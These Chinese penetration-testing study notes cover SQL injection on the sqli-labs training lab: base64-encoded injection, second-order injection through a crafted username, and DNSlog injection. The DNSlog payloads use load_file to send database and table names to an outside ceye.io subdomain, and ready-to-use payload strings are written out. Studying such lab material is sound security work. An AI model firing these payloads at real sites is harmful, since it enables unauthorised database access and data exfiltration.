小迪渗透测试学习笔记(十七)WEB漏洞-二次,加解密,DNS等注入

1. 加解密注入

get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ==
加密部分:MQ==
解密结果:1

案例:sqlilabs-less21

  1. burp抓包
    在这里插入图片描述
    在这里插入图片描述
  2. forward,可以看到uname=YWRtaW4%3D
    在这里插入图片描述
  3. %3D 为 = ,base解密为admin
    在这里插入图片描述
  4. 将uname的值改为注入语句:
admin' or updatexml(1,concat(0x7e,(database())),0) or '

并进行base64加密,得:

YWRtaW4nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSksMCkgb3IgJw==

在这里插入图片描述

  1. 注入成功
    在这里插入图片描述

2. 二次注入

在这里插入图片描述
二次注入是存储型注入,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。

案例:sqlilabs-less24

  1. 注册新用户
    在这里插入图片描述

在这里插入图片描述
2. 登录新注册的用户修改密码为aaa
在这里插入图片描述

  1. 查询数据库,可以发现admin1’#的密码没有改,而admin1的密码更改了
    在这里插入图片描述
    原因是代码执行的过程中将’#没有过滤直接带入执行导致’与前面的代码闭合而#将后面的代码注释了。

3. DNSlog注入

案例:sqlilabs-less9

  1. http://ceye.io/注册一个账号在这里插入图片描述
  2. 构建payload,获取库名
http://127.0.0.1/sqli-labs/Less-9/?id=1' and load_file(concat("\\\\",database(),".xxxx.ceye.io\\xxxx.txt"))--+

注: .xxxx.ceye.io 是自己子域名,前面要加个 .
后面的\xxx.txt,\是必须的,xxx.txt这部分随便,不能为空。
在这里插入图片描述
3. 构建payload,获取表名

http://127.0.0.1/sqli-labs/Less-9/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".xxxx.ceye.io\\xxxx.txt"))--+

在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值